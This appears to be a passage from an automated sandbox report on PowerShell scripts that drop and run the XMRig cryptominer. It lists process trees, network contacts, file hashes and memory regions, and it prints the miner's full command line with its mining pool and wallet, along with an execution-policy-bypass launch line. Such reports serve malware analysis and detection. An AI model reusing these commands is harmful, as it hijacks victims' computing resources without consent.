SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2976-47-0x0000024852430000-0x0000024852450000-memory.dmp

memory/2976-48-0x0000024853E30000-0x0000024853E50000-memory.dmp

memory/2976-49-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/5060-50-0x00007FF8CEBF3000-0x00007FF8CEBF5000-memory.dmp

memory/5060-51-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp

memory/2976-54-0x0000024853E70000-0x0000024853E90000-memory.dmp

memory/2976-53-0x0000024853E50000-0x0000024853E70000-memory.dmp

memory/2976-52-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-55-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/5060-56-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp

memory/2976-57-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-59-0x0000024853E70000-0x0000024853E90000-memory.dmp

memory/2976-58-0x0000024853E50000-0x0000024853E70000-memory.dmp

memory/2976-60-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-61-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-62-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-63-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-64-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-65-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-66-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-67-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-68-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-69-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-70-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-71-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-72-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-73-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-74-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-75-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-76-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-77-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-78-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-79-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-80-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-81-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-82-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-83-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-84-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-85-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-86-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-87-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-88-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-89-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-90-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-91-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-92-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-93-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-94-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-95-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-96-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-97-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-98-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-99-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-100-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-101-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-102-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-103-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-104-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-105-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-106-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-107-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-108-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-109-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-110-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-111-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-112-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-113-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-114-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-115-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-116-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-117-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

memory/2976-118-0x00007FF60D0C0000-0x00007FF60DCF3000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
NL 23.62.61.145:443 www.bing.com tcp
US 8.8.8.8:53 145.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp

Files

memory/3684-0-0x00007FF8E8B03000-0x00007FF8E8B05000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mk2ae525.qc5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3684-6-0x0000022E73300000-0x0000022E73322000-memory.dmp

memory/3684-11-0x00007FF8E8B00000-0x00007FF8E95C1000-memory.dmp

memory/3684-12-0x00007FF8E8B00000-0x00007FF8E95C1000-memory.dmp

memory/3684-14-0x00007FF8E8B00000-0x00007FF8E95C1000-memory.dmp

memory/3684-15-0x0000022E73710000-0x0000022E73722000-memory.dmp

memory/3684-16-0x0000022E73390000-0x0000022E7339A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2208-47-0x00000243FAAE0000-0x00000243FAB00000-memory.dmp

memory/2208-48-0x00000243FAB30000-0x00000243FAB50000-memory.dmp

memory/3684-50-0x00007FF8E8B03000-0x00007FF8E8B05000-memory.dmp

memory/2208-49-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/3684-51-0x00007FF8E8B00000-0x00007FF8E95C1000-memory.dmp

memory/3684-53-0x00007FF8E8B00000-0x00007FF8E95C1000-memory.dmp

memory/2208-55-0x00000243FC320000-0x00000243FC340000-memory.dmp

memory/2208-54-0x00000243FC300000-0x00000243FC320000-memory.dmp

memory/2208-52-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/3684-57-0x00007FF8E8B00000-0x00007FF8E95C1000-memory.dmp

memory/2208-56-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-58-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-59-0x00000243FC300000-0x00000243FC320000-memory.dmp

memory/2208-60-0x00000243FC320000-0x00000243FC340000-memory.dmp

memory/2208-61-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-62-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-63-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-64-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-65-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-66-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-67-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-68-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-69-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-70-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-71-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-72-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-73-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-74-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-75-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-76-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-77-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-78-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-79-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-80-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-81-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-82-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-83-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-84-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-85-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-86-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-87-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-88-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-89-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-90-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-91-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-92-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-93-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-94-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-95-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-96-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-97-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-98-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-99-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-100-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-101-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-102-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-103-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-104-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-105-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-106-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-107-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-108-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-109-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-110-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-111-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-112-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-113-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-114-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-115-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-116-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-117-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-118-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

memory/2208-119-0x00007FF7A8240000-0x00007FF7A8E73000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/424-3-0x00007FFF29BE3000-0x00007FFF29BE4000-memory.dmp

memory/424-5-0x0000026F7CC30000-0x0000026F7CC52000-memory.dmp

memory/424-8-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-9-0x0000026F7CEF0000-0x0000026F7CF66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lo0obow1.z52.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/424-10-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-25-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-48-0x0000026F7CF70000-0x0000026F7CF82000-memory.dmp

memory/424-61-0x0000026F7CED0000-0x0000026F7CEDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3636-90-0x0000017F2FD00000-0x0000017F2FD20000-memory.dmp

memory/3636-91-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/424-92-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-93-0x00007FFF29BE3000-0x00007FFF29BE4000-memory.dmp

memory/424-95-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/3636-94-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/424-96-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/3636-97-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-98-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-99-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-100-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-101-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-102-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-103-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-104-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-105-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-106-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-107-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-108-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-109-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-110-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-111-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-112-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-113-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-114-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-115-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-116-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-117-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-118-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-119-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-120-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-121-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-122-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-123-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-124-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-125-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-126-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-127-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-128-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-129-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-130-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-131-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-132-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-133-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-134-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-135-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-136-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-137-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-138-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-139-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-140-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-141-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-142-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-143-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-144-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-145-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-146-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-147-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-148-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-149-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-150-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-151-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-152-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-153-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-154-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-155-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-156-0x00007FF623100000-0x00007FF623D33000-memory.dmp

memory/3636-157-0x00007FF623100000-0x00007FF623D33000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:45

Platform

win11-20240426-en

Max time kernel

1792s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
